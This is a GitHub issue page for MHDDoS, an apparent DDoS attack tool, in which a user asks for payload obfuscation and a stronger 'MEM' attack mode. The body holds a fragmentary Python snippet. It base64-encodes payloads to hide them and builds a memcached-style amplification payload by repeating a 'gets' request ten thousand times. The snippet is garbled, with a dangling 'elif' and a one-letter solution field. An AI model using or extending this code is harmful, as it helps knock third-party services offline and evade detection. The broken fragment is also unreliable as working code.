MHDDoS icon indicating copy to clipboard operation
MHDDoS copied to clipboard

obuscation and better mem

Open s-b-repo opened this issue 1 year ago • 0 comments

Which section is this feature request for?

L7 (DDoS Attack Layer 7)

Is there an existing issue for this?

  • [X] I have searched the existing issues

Is your feature request related to a problem? Please describe the problem.

import base64

def obfuscate(payload): return base64.b64encode(payload)

elif name == "MEM": payload = b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n' * 10000

Describe the solution you'd like

b

Additional context

No response

s-b-repo avatar May 23 '24 23:05 s-b-repo